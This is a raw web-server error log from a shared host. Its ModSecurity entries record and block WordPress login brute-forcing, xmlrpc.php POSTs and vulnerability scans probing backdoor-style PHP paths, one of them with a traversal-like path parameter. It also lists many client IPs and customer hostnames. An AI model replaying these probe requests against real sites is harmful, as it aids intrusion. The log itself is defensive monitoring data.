[Tue May 26 13:21:59.911086 2026] [deflate:error] [pid 512745:tid 512991] (104)Connection reset by peer: [client 212.119.47.254:35375] AH10298: failed reading from PIPE bucket
[Tue May 26 13:22:00.402162 2026] [security2:error] [pid 512745:tid 512882] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRIHKSB_s2CvZg7xNOswAAARE"]
[Tue May 26 13:22:00.414074 2026] [security2:error] [pid 512745:tid 512913] [client 217.145.224.160:27723] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php"] [unique_id "ahVRIHKSB_s2CvZg7xNOvQAAATA"]
[Tue May 26 13:22:00.648182 2026] [security2:error] [pid 512745:tid 512943] [client 212.119.47.254:31531] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRIHKSB_s2CvZg7xNOwgAAAU4"]
[Tue May 26 13:22:00.648215 2026] [security2:error] [pid 512745:tid 512943] [client 212.119.47.254:31531] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/xmlrpc.php"] [unique_id "ahVRIHKSB_s2CvZg7xNOwgAAAU4"]
[Tue May 26 13:22:01.368242 2026] [security2:error] [pid 512344:tid 512489] [client 130.49.9.239:46421] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php"] [unique_id "ahVRIcbElyei4S77DQfpLAAAAA8"]
[Tue May 26 13:22:01.423163 2026] [deflate:error] [pid 512344:tid 512522] (104)Connection reset by peer: [client 212.119.47.254:24577] AH10298: failed reading from PIPE bucket
[Tue May 26 13:22:01.541013 2026] [security2:error] [pid 512745:tid 512950] [client 107.152.47.63:61621] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.47.152.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVRIXKSB_s2CvZg7xNOxwAAAVU"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 13:22:01.541166 2026] [security2:error] [pid 512745:tid 512950] [client 107.152.47.63:61621] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVRIXKSB_s2CvZg7xNOxwAAAVU"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 13:22:01.718048 2026] [security2:error] [pid 512344:tid 512561] [client 62.216.64.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahVRIcbElyei4S77DQfpNAAAAFc"]
[Tue May 26 13:22:01.978159 2026] [security2:error] [pid 512344:tid 512526] [client 62.216.64.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahVRIcbElyei4S77DQfpPAAAADQ"]
[Tue May 26 13:22:02.022260 2026] [security2:error] [pid 512344:tid 512490] [client 107.152.47.63:61625] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVRIcbElyei4S77DQfpPQAAABA"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 13:22:02.041271 2026] [autoindex:error] [pid 512745:tid 512954] [client 5.133.192.128:43629] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:22:02.173786 2026] [security2:error] [pid 512344:tid 512520] [client 212.119.47.254:41449] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRIsbElyei4S77DQfpQQAAAC4"]
[Tue May 26 13:22:02.173818 2026] [security2:error] [pid 512344:tid 512520] [client 212.119.47.254:41449] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRIsbElyei4S77DQfpQQAAAC4"]
[Tue May 26 13:22:02.683237 2026] [security2:error] [pid 512344:tid 512481] [client 172.241.246.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahVRIsbElyei4S77DQfpXQAAAAc"]
[Tue May 26 13:22:02.702464 2026] [security2:error] [pid 512344:tid 512560] [client 172.241.246.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahVRIsbElyei4S77DQfpWwAAAFY"]
[Tue May 26 13:22:02.937444 2026] [deflate:error] [pid 512344:tid 512479] (104)Connection reset by peer: [client 212.119.47.254:25879] AH10298: failed reading from PIPE bucket
[Tue May 26 13:22:03.175783 2026] [security2:error] [pid 512344:tid 512477] [client 172.241.246.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahVRI8bElyei4S77DQfpdAAAAAM"]
[Tue May 26 13:22:03.271511 2026] [security2:error] [pid 512745:tid 512860] [remote 74.7.241.58:34158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVRI3KSB_s2CvZg7xNO0AABXHI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:22:03.394327 2026] [security2:error] [pid 512344:tid 512583] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRIsbElyei4S77DQfpbAAAAG0"]
[Tue May 26 13:22:03.672752 2026] [security2:error] [pid 512344:tid 512524] [client 212.119.47.254:25143] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRI8bElyei4S77DQfpfwAAADI"]
[Tue May 26 13:22:03.672779 2026] [security2:error] [pid 512344:tid 512524] [client 212.119.47.254:25143] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRI8bElyei4S77DQfpfwAAADI"]
[Tue May 26 13:22:04.423365 2026] [deflate:error] [pid 512745:tid 512951] (104)Connection reset by peer: [client 212.119.47.254:56893] AH10298: failed reading from PIPE bucket
[Tue May 26 13:22:05.171655 2026] [security2:error] [pid 512745:tid 512975] [client 212.119.47.254:64571] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRJXKSB_s2CvZg7xNO9wAAAW4"]
[Tue May 26 13:22:05.171684 2026] [security2:error] [pid 512745:tid 512975] [client 212.119.47.254:64571] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/xmlrpc.php"] [unique_id "ahVRJXKSB_s2CvZg7xNO9wAAAW4"]
[Tue May 26 13:22:05.459073 2026] [security2:error] [pid 512745:tid 512915] [client 123.16.130.217:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRJXKSB_s2CvZg7xNO9QAAATI"]
[Tue May 26 13:22:05.661976 2026] [security2:error] [pid 512745:tid 512909] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRJXKSB_s2CvZg7xNO_QAAASw"]
[Tue May 26 13:22:05.710734 2026] [security2:error] [pid 512745:tid 512982] [client 4.201.75.230:5266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahVRJXKSB_s2CvZg7xNPBgAAAXU"]
[Tue May 26 13:22:05.943531 2026] [deflate:error] [pid 512745:tid 512924] (104)Connection reset by peer: [client 212.119.47.254:60651] AH10298: failed reading from PIPE bucket
[Tue May 26 13:22:07.261836 2026] [security2:error] [pid 512344:tid 512588] [client 83.142.52.157:13809] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/wp-login.php"] [unique_id "ahVRJsbElyei4S77DQfpnAAAAHI"]
[Tue May 26 13:22:08.086147 2026] [security2:error] [pid 512745:tid 512904] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRJ3KSB_s2CvZg7xNPLQAAASc"]
[Tue May 26 13:22:08.913372 2026] [security2:error] [pid 512745:tid 512895] [client 4.201.75.230:5294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahVRKHKSB_s2CvZg7xNPSQAAAR4"]
[Tue May 26 13:22:09.393165 2026] [security2:error] [pid 512745:tid 512988] [client 43.173.180.201:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVRKHKSB_s2CvZg7xNPUAAAAXs"]
[Tue May 26 13:22:09.394394 2026] [security2:error] [pid 512745:tid 512957] [client 43.173.177.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVRKHKSB_s2CvZg7xNPUQAAAVw"]
[Tue May 26 13:22:10.234986 2026] [security2:error] [pid 512745:tid 512951] [client 83.142.52.157:45179] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php"] [unique_id "ahVRKnKSB_s2CvZg7xNPbwAAAVY"]
[Tue May 26 13:22:10.356343 2026] [security2:error] [pid 512745:tid 512879] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRKXKSB_s2CvZg7xNPZwAAAQ4"]
[Tue May 26 13:22:12.028480 2026] [security2:error] [pid 512745:tid 512881] [client 74.7.230.53:50658] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kineticinfraprojects.com.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVRLHKSB_s2CvZg7xNPlQABEAc"]
[Tue May 26 13:22:12.605718 2026] [security2:error] [pid 512745:tid 512875] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRLHKSB_s2CvZg7xNPmAAAAQo"]
[Tue May 26 13:22:12.781039 2026] [security2:error] [pid 512745:tid 512879] [client 216.244.66.241:55418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/committees/compliance/index.html"] [unique_id "ahVRLHKSB_s2CvZg7xNPqAAAAQ4"]
[Tue May 26 13:22:12.781148 2026] [security2:error] [pid 512745:tid 512879] [client 216.244.66.241:55418] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/committees/compliance/index.html"] [unique_id "ahVRLHKSB_s2CvZg7xNPqAAAAQ4"]
[Tue May 26 13:22:14.734741 2026] [security2:error] [pid 512745:tid 512838] [remote 45.250.255.226:55724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVRLnKSB_s2CvZg7xNPwAABKlw"]
[Tue May 26 13:22:15.258567 2026] [security2:error] [pid 512745:tid 512895] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRLnKSB_s2CvZg7xNPxwAAAR4"]
[Tue May 26 13:22:16.394723 2026] [security2:error] [pid 512745:tid 512878] [client 4.201.75.230:5290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahVRMHKSB_s2CvZg7xNP3wAAAQ0"]
[Tue May 26 13:22:16.965603 2026] [security2:error] [pid 512344:tid 512504] [client 66.249.66.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVRMMbElyei4S77DQfqFgAAAB4"]
[Tue May 26 13:22:17.323403 2026] [security2:error] [pid 512745:tid 512911] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRMHKSB_s2CvZg7xNP5wAAAS4"]
[Tue May 26 13:22:18.567860 2026] [security2:error] [pid 512745:tid 512939] [client 4.201.75.230:5278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahVRMnKSB_s2CvZg7xNQJAAAAUo"]
[Tue May 26 13:22:19.212073 2026] [security2:error] [pid 512344:tid 512558] [client 185.191.171.1:16288] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVRM8bElyei4S77DQfqSQAAAFQ"]
[Tue May 26 13:22:19.212196 2026] [security2:error] [pid 512344:tid 512558] [client 185.191.171.1:16288] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVRM8bElyei4S77DQfqSQAAAFQ"]
[Tue May 26 13:22:19.366943 2026] [security2:error] [pid 512344:tid 512586] [client 4.201.75.230:5284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/wp-admin/user/index.php"] [unique_id "ahVRM8bElyei4S77DQfqUAAAAHA"]
[Tue May 26 13:22:19.682302 2026] [security2:error] [pid 512344:tid 512526] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRM8bElyei4S77DQfqTAAAADQ"]
[Tue May 26 13:22:21.477303 2026] [security2:error] [pid 512745:tid 512933] [client 114.119.136.24:47773] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/episodes/performance-pressure-cooker-the-struggle-series/"] [unique_id "ahVRNXKSB_s2CvZg7xNQYQAAAUQ"], referer: https://preetishah.com/episodes/is-silence-really-golden-the-struggle-series
[Tue May 26 13:22:21.747256 2026] [security2:error] [pid 512745:tid 512954] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRNXKSB_s2CvZg7xNQXQAAAVk"]
[Tue May 26 13:22:24.538546 2026] [security2:error] [pid 512745:tid 512898] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVROHKSB_s2CvZg7xNQkwAAASE"]
[Tue May 26 13:22:24.650077 2026] [security2:error] [pid 512745:tid 512920] [client 4.201.75.230:5295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ytejju8iu.com.md-74.webhostbox.net"] [uri "/wp-conf.php"] [unique_id "ahVROHKSB_s2CvZg7xNQmAAAATc"]
[Tue May 26 13:22:26.669898 2026] [security2:error] [pid 512745:tid 512974] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVROnKSB_s2CvZg7xNQuAAAAW0"]
[Tue May 26 13:22:26.807571 2026] [security2:error] [pid 512745:tid 512755] [remote 173.252.87.35:42636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVROXKSB_s2CvZg7xNQpQABFwk"]
[Tue May 26 13:22:28.310096 2026] [security2:error] [pid 512344:tid 512410] [remote 31.24.44.107:43876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVRPMbElyei4S77DQfqtwAAdEE"]
[Tue May 26 13:22:28.638106 2026] [security2:error] [pid 512344:tid 512581] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRPMbElyei4S77DQfquwAAAGs"]
[Tue May 26 13:22:30.145935 2026] [security2:error] [pid 512344:tid 512420] [remote 163.61.60.30:56112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVRPcbElyei4S77DQfq0QAALks"]
[Tue May 26 13:22:30.707052 2026] [security2:error] [pid 512745:tid 512783] [remote 88.198.165.116:52826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVRPnKSB_s2CvZg7xNQ9AABhyU"]
[Tue May 26 13:22:31.873159 2026] [security2:error] [pid 512745:tid 512895] [client 208.91.198.85:42330] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahVRP3KSB_s2CvZg7xNRDQAAAR4"]
[Tue May 26 13:22:32.050976 2026] [security2:error] [pid 512745:tid 512971] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRP3KSB_s2CvZg7xNRBwAAAWo"]
[Tue May 26 13:22:32.423077 2026] [security2:error] [pid 512344:tid 512509] [client 37.208.73.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRQMbElyei4S77DQfq5gAAACM"]
[Tue May 26 13:22:33.360641 2026] [security2:error] [pid 512745:tid 512958] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRQHKSB_s2CvZg7xNRKQAAAV0"]
[Tue May 26 13:22:36.034483 2026] [security2:error] [pid 512745:tid 512960] [client 216.244.66.241:54020] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/committees/ethic/zanyokentai20211016.pdf"] [unique_id "ahVRRHKSB_s2CvZg7xNRZgAAAV8"]
[Tue May 26 13:22:36.034600 2026] [security2:error] [pid 512745:tid 512960] [client 216.244.66.241:54020] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/committees/ethic/zanyokentai20211016.pdf"] [unique_id "ahVRRHKSB_s2CvZg7xNRZgAAAV8"]
